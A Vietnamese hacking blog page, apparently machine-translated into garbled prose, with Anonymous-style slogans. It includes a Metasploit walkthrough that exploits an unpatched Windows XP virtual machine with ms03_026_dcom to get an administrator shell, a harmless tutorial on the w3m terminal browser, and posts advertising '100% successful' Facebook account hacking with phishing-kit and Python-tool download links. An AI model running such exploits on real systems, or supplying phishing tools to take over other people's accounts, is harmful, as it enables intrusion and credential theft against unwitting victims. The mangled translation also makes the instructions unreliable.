NNB:TOP BEST MOVIE OR HACKER 2016

TOP BEST MOVIE OR HACKER 2016

Kiểm tra thâm nhập - Hacking XP

Cách tiếp cận của chúng tôi để thử nghiệm thâm nhập sẽ là đơn giản. Tôi đã thực hiện một bài về cách lý tưởng để bắt đầu thử nghiệm thâm nhập. Nhưng chúng tôi sẽ không cách lý tưởng. Tôi sẽ dạy bạn xâm nhập thử nghiệm cách tôi học được nó. Bằng cách thâm nhập và khai thác thực tế. Chúng ta có thể không hack hoàn toàn vá Windows 7 hoặc Windows 8 ngay trong bài trước, nhưng chúng tôi chắc chắn có thể hack một máy tính Windows XP chưa được vá. Tuy nhiên, để làm được điều đó, bạn cần máy tính nạn nhân. Thử nghiệm phương pháp này trên máy tính của người khác là không nên và khá bất hợp pháp. Nó được khuyên nên tạo ra ảo ​​của riêng bạn máy và kiểm tra khai thác ở đó.

bạn đang làm gì để cần

Hiểu biết

  • Cơ bản điều khoản kiểm tra thâm nhập (tôi khuyên bạn nên có một cái nhìn ở đây, như tôi sẽ sử dụng các từ ngữ một cách tự do mà không có bất kỳ lời giải thích ở đây trong hướng dẫn này)
  • Cách hướng dẫn sử khó khăn của thử nghiệm thâm nhập (Một miếng vá lớn các vật liệu tiên tiến sẽ giúp bạn trở thành một pentester tuyệt vời nếu bạn có đủ kiên nhẫn để đọc tất cả và khả năng để hiểu nó)
  • Công cụ VMWare (Nếu không có các công cụ Vmware không có cách nào bạn có thể có một Kali Linux (máy tấn công) và XP chưa được vá (máy tính mục tiêu) đang chạy cùng một lúc trong một máy tính duy nhất)

virtual Machines

  • Kali Linux :bạn có thể tải  phiên bản 2016 tại     đây
  • cài đặt kali linux bạn tìm hiểu trên mạng google    
  • Windows XP (Sau khi bạn đã làm theo các hướng dẫn ở trên để cài đặt Kali Linux, cài đặt XP trên một máy ảo sẽ là một miếng bánh, một vài ảnh chụp màn hình của quá trình)



Bây giờ có bắt trong Windows XP. Trong khi Kali Linux là miễn phí, Windows XP không phải là. Vì vậy, bạn phải mua một cái. Tôi chết chống vi phạm bản quyền, và sẽ không thúc đẩy bất cứ thứ gì của loại đó trên blog của tôi. Chỉ cần chắc chắn rằng khi bạn đang mua một đĩa CD Windows XP, nó là chưa được vá và SP1. Nếu nó được vá sau đó khai thác sẽ không hoạt động. Đặt cược của bạn tốt nhất là nên nhìn lên kệ của bạn để tìm một cd XP cũ mà bạn đã mua năm trước đó được đánh bắt bụi, và đặt nó vào một số sử dụng.

Một cái nhìn Metasploit Framework

Bắt đầu từ khung

"Để phù hợp với các chính sách mạng Dịch vụ Kali Linux, không có dịch vụ mạng, bao gồm cả các dịch vụ cơ sở dữ liệu, chạy khi khởi động vì vậy có một vài bước mà cần phải được thực hiện để có được Metasploit và chạy với hỗ trợ cơ sở dữ liệu." Đơn giản chỉ cần nói, có một số dịch vụ mà nhu cầu Metasploit mà không bắt đầu với hệ thống khởi động. Vì vậy, đây là một số lệnh mà bạn cần phải thực hiện trên giao diện điều khiển của bạn trước khi bạn có thể bắt đầu Metasploit
service postgresql start                  (dịch vụ bắt đầu postgresql)
(Metasploit sử dụng PostgreSQL là cơ sở dữ liệu của nó nên nó cần phải được đưa ra đầu tiên.)Với PostgreSQL và chạy, chúng ta tiếp theo cần phải khởi động dịch vụ Metasploit. Lần đầu tiên các dịch vụ được khởi động, nó sẽ tạo ra một cơ sở dữ liệu người dùng msf3 và một cơ sở dữ liệu được gọi là msf3. Dịch vụ này cũng sẽ khởi chạy Metasploit RPC và máy chủ web nó đòi hỏi.


service metasploit start        (dịch vụ bắt đầu Metasploit)
Bây giờ cuối cùng chúng tôi đã sẵn sàng để bắt đầu khung Metasploit.
msfconsole

Nhìn vào các mục tiêu

Ngay bây giờ, khuôn khổ Metasploit tôi đang chạy trên Kali trên VMware trên một máy tính Windows 8. Ngoài ra, có một máy ảo Windows XP Sp3 đang chạy bên cạnh tôi với Kali của tôi. Vì vậy, những gì chúng ta cần làm là phát hiện các máy trong khuôn khổ Metasploit. Đối với điều này, chúng tôi sẽ làm một cổng quét.

port Scan

Metasploit cung cấp một chức năng quét cổng awesome mà đi bằng tên máy quét phụ trợ. Đây là lệnh để thực hiện quét này
Để sử dụng tính năng này, nhập số- sau
  use auxiliary/scanner/portscan/tcp              (sử dụng phụ trợ / quét / portscan / tcp)
Gõ tùy chọn chương trình để xem các tùy chọn có sẵn
show options           (lựa chọn chương trình)
 Bây giờ chúng ta phải thay đổi một vài thiết lập, trước hết, chúng ta nên giảm số lượng các cổng quét
set ports 1-500   ( thiết lập cổng 1-500)
Thứ hai, chúng ta phải xác định một mục tiêu IP để quét. Bây giờ đây là một chút khó khăn, như là IP sẽ không được giống nhau trong tất cả các trường hợp. Vì vậy, đây là những gì bạn sẽ làm.Đến máy ảo XP của bạn (một trong những bạn đang cố gắng để hack). Mở dấu nhắc lệnh và gõ
ipconfig
Trong các kết quả, kiểm tra IP của máy. Đây là những gì bạn sẽ phải chỉ định các tùy chọn Rhosts như.
Trong trường hợp của tôi IP là 192.168.63.131
Bây giờ trở lại máy Kali của bạn, và gõ các fol (thay đổi IP theo yêu cầu)
set RHOST 192.168.63.131
Dưới đây là những gì nó sẽ giống như


Có một lỗi nhỏ ở đây, tôi đánh vần Rhosts sai. Hãy chắc chắn rằng bạn thêm 's' ở cuối.
Bây giờ chúng tôi đã sẵn sàng cho một số hành động, làm một chương trình lựa chọn một lần nữa để xem những gì tất cả các thay đổi mà bạn đã thực hiện. Cuối cùng, loại-
run
Việc quét sẽ bắt đầu và sau một thời gian nó sẽ cho bạn thấy những tcp cổng đang mở và dễ bị tấn công.
Nếu bạn đã không được sử dụng một phiên bản chưa được vá của Windows, sẽ không có bất kỳ cổng dễ bị tổn thương.

Điều này về cơ bản có nghĩa là không có các cổng mở ở đây. Không có gì nhiều, bạn có thể làm.Tuy nhiên nếu bạn đã có một số may mắn đó, và đã có một máy dễ bị tổn thương, bạn sẽ có một số cổng dễ bị tổn thương. Trong trường hợp của tôi, tôi tắt tường lửa trên máy cửa sổ và chạy các module phụ nữa.
Tôi có 3 cổng mở thời gian này. Nếu bạn đang sử dụng một số phiên bản XP cao hơn, bạn cũng có thể cần phải vô hiệu hóa tường lửa để có được các cổng mở. 
Bây giờ chúng tôi biết chúng tôi có một mục tiêu tại IP 192.168.63.131 và nó có cổng 135 139445 mở.


cuộc sống thực cổng quét

Trong môi trường pentesting thực tế, bạn không biết về IP, cổng mở và hệ điều hành của máy tính mục tiêu. Trong trường hợp như vậy, chúng ta có thể sử dụng máy quét cổng Nmap đó là tốt hơn nhiều so với phụ trợ. Chúng tôi sẽ đến đó sau.

tìm Exploits

Bước này rất quan trọng. Chúng ta cần phải tìm ra mà khai thác làm việc trên các hệ điều hành, chúng tôi đang tấn công. Trong trường hợp của chúng tôi, chúng tôi đã biết phải làm gì. Gõ lại để có được ra khỏi máy quét phụ trợ. Tìm kiếm dcom trên msfconsole.
search dcom
Đây là khai thác rất nổi tiếng cho Windows.
Copy khai thác số 3. (nào cho thấy tuyệt vời như xếp hạng). Trong dòng, loại tiếp theo
use exploit/windows/dcerpc/ms03_026_dcom
Bạn đang sử dụng Windows nổi tiếng nhất khai thác. Loại chương trình lựa chọn một lần nữa
show options
Một lần nữa, thiết lập các RHOST như 192.168.63.131 (thay thế với IP của mục tiêu của bạn)
set RHOST 192.168.63.131
Ngoài ra, thiết lập một tải trọng.
set PAYLOAD windows/shell_bind_tcp

Và đây là phần tốt nhất
exploit

Bây giờ bạn đã bị phá vỡ thành công vào các máy tính mục tiêu. Bạn có một vỏ mở trên các máy tính mục tiêu với quyền quản trị. Trong ngắn hạn, bạn sở hữu máy tính bây giờ. Hãy thử tất cả những gì bạn có thể làm từ đây. Tôi sẽ đưa ra ở những hướng dẫn tiếp theo. 


chúc các bạn thành công!!

NNB:Kiểm tra thâm nhập - Hacking XP với kali linux 2.0

Duyệt web như hacker bằng Terminal với W3M kali linux 2.0
Tất cả mọi người sử dụng để duyệt trang web trên trình duyệt web khác nhau, nhưng bạn có biết làm thế nào để làm trình duyệt trên Linux Terminal, Hầu hết người dùng không biết rằng họ có thể duyệt web từ dòng lệnh.
w3m là đơn giản Hỗ trợ trình duyệt Text-Based cho kết nối SSL, Bàn, và màu sắc khung và hình ảnh nội tuyến trên thiết bị đầu cuối phù hợp. Nói chung, nó ám trang trong một hình thức như thật với bố trí ban đầu của chúng. Với w3m bạn có thể duyệt các trang web thông qua một thiết bị đầu cuối. Hơn nữa, w3m có thể được sử dụng như một công cụ định dạng văn bản mà loại bộ HTML sang văn bản đơn giản.
Nó có một vài thủ thuật lên tay áo của mình, bao gồm hỗ trợ cho hình ảnh, các tab, bảng, khung và các tính năng khác thường không có trong các trình duyệt web đầu cuối.
Nếu bạn đang sử dụng Linux cho một thời gian, bạn có thể nhớ sử dụng một trình duyệt thiết bị đầu cuối để Google ra một giải pháp cho phần cứng của bạn khi máy chủ X từ chối để tải. Vào thời gian đó bạn có thể sử dụng w3m với hỗ trợ hình ảnh nội tuyến.
Các tính năng:
Bạn có thể làm theo các liên kết và / hoặc xem hình ảnh trong HTML
Internet chế độ xem trước tin nhắn, bạn có thể duyệt mail HTML
Bạn có thể làm theo các liên kết trong văn bản đơn giản nếu nó bao gồm các hình thức URL
Với w3m-img, bạn có thể xem hình ảnh nội tuyến và nhiều hơn nữa ...
Cài đặt w3m:
W3m không được bao gồm theo mặc định trên hầu hết các bản phân phối Linux. Bạn sẽ muốn cài đặt các gói w3m chính và các gói w3m-img nếu bạn muốn hỗ trợ hình ảnh nội tuyến.
Lệnh:cài dặt

#sudo apt-get install w3m w3m-img

Gói chương trình w3m chiếm 1,408 kB 

dung lượng, và sau khi cài vào, chỉ chiếm 

vỏn vẹn 3,118 kB dung lượng trên ổ cứng.

Chỉ vài thao tác là xong!!

·                     Cách dùng:
·                     Shift + B: để trở về trang trước;
·                     Shift + U: Để mở Url khác (gõ trang web khác và ấn Enter để đi tới trang web đó);
·                     Shift + H: Để bật trang trợ giúp (Help) của w3m. Tại đây bạn có thể xem đầy đủ danh sách các phím tắt của w3m. Để thoát trang trợ giúp: Ấn phím 'ESC' rồi ấn phím mũi tên đi xuống.
Để thoát w3m, ấn 'q' rồi ấn 'y' (Quit? Yes!).

W3M có một vài tùy chọn bằng dòng lệnh, nhưng hoàn toàn không phải bắt buộc. Thông tin duy nhất cần được chỉ định rõ ràng chỉ là địa chỉ trang web cần thiết. Nếu muốn truy cập Google thì các bạn sử dụng lệnh:
w3m google.com
Sử dụng phím 4 mũi tên trên bàn phím để di chuyển vị trí của con trỏ, hoặc nhấn chuột vào vị trí bất kỳ trên màn hình để chuyển con trỏ tới đó. Nếu muốn nhập nội dung vào text box, chọn vị trí ô text box đó và nhấn Enter trước khi nhập. W3Msẽ xử lý các tổ hợp phím như lệnh khi người dùng bắt đầu gõ:


Nếu muốn mở 1 đường dẫn bất kỳ nào đó, dùng con trỏ để lựa chọn, sau đó nhấnEnter. Sau đó, nhấn phím Tab để chuyển tới đường URL tiếp theo trên trang web:

ảnh minh họa/... về trình duyệt




Nhấn Shift + B để quay trở về trang web trước đó, còn nếu muốn mở URL khác thì nhấn Shift + U và tùy chọn URL sẽ hiển thị. Nhấn Shift + H để xem trangHelp và danh sách shortcut hoàn chỉnh.
Xử lý ảnh trong Terminal:

W3M có hỗ trợ chế độ hiển thị ảnh, vậy chúng ở đâu? Về mặt kỹ thuật, ứng dụngTerminal như GNOME Terminal và Konsole của KDE lại không thể hiển thị ảnh trên W3M, còn đối với một số dạng Terminal khác như Xterm thì lại có thể. Bên cạnh đó, W3M sẽ hiển thị đầy đủ nếu đang ở trong chế độ điều khiểnframebuffer, do vậy chúng ta sẽ không phải cần tới X server nữa:














FACEBOOK:
Một tính năng khác không hoạt động trong GNOME Terminal hoặc Konsole là menu chuột phải của W3M:

Tab:
Đây chắc chắn là 1 thành phần không thể thiếu đối với bất kỳ trình duyệt nào hiện nay, và W3M cũng vậy. Nhấn Shift + T để mở tab mới:

Để thay đổi giữa các tab khác nhau, chúng ta chỉ cần nhấn chuột để lựa chọn. Hoặc dùng phím { hoặc } (Shift + [ hoặc Shift + ] tương ứng). Với nhiều cải tiến hiện nay,

Bên cạnh đó, các bạn có thể tự tham khảo và tìm hiểu thêm về hệ thống tính năng . Tuy nhiên, trình duyệt dựa trên Terminal này vẫn chưa thể hỗ trợ JavaScript.












Chúc các bạn thành công!!!1

Cài đặt trình duyệt hacker trên kali linux 2.0

        NNB: hack tài  khoản facebook thành công 100% cũ nhất + mới nhất 2016
                 



Phishing là gì? Và cách để bạn bảo vệ mình


Phishing là việc xây dựng những hệ thống lừa đảo nhằm đánh cắp các thông tin nhạy cảm, như tên đăng nhập, mật khẩu hay thông tin về các loại thẻ tín dụng của người dùng. Phishing xuất hiện như một thực thể đáng tin cậy, một trang thông tin điện tử, eBay, Paypal, gmail, hay các ngân hàng trực tuyến là những mục tiêu hướng đến của hình thức tấn công này. Phishing thường được thực hiện qua email, những tin nhắn nhanh và thường tập trung vào hướng lừa người dùng nhập các thông tin vào một form hay click vào một đường dẫn của website lừa đảo.
Những vụ tấn công Phishing gần đây thường tập trung vào đối tượng là những khách hàng của các ngân hàng hay các dịch vụ thanh toán trực tuyến.
Giả mạo hay gian lận qua email là công cụ được sử dụng phổ biến nhất để thực hiện tấn công Phishing. Trong hầu hết các trường hợp tin tặc có thể lấy một email giả mạo mà có đia chỉ từ một từ một website tin cậy như abc@vncert.gov.vn chẳng hạn. Khi đó, các tin tặc có thể yêu cầu nạn nhân xác nhận tên đăng nhập và mật khẩu bằng cách phát lại đến một địa chỉ email nhất định.....
nhưng ở đây chúng tôi đang đề cập nó về facebook: bạn hãy xem video dưới đây và làm theo...
cách đề phòng: không nhấp link vào facebook giã mạo ,các trang yêu cầu nhập đăng nhập facebook
 Tài khoản host

  

Tài khoản tên miền
page:  facebook
bloghacking:  blog
Tải Phishing:     TẢI
xem video hack qua Phishing






▶NNB: hack tài khoản facebook thành công 100% cũ nhất + mới nhất 2016


    Phương pháp thâm nhập                         Facebook

thông qua các chương trình                           python▶ 



link Tải...file pythonhack
  
                     TẢI

▶ video hướng dẫn▶ 




cảm ơn bạn đọc...chúng tôi hy vọng sẻ có nhiều thời gian chia sẻ   cho bạn đọc...

MẬT DANH: ▶ 
CHÚNG TÔI LÀ ANONYMOUS - CHÚNG TÔI  - không tha thứ - KHÔNG QUÊN - WAIT FOR US NNB



CHÚNG TÔI LÀ ANONYMOUS - CHÚNG TÔI - không tha thứ - KHÔNG QUÊN - WAIT FOR US NNB

Phương pháp thâm nhập Facebook thông qua các chương trình python

 
Nhoxnamby © 2015 |Blog content
Share Emphasis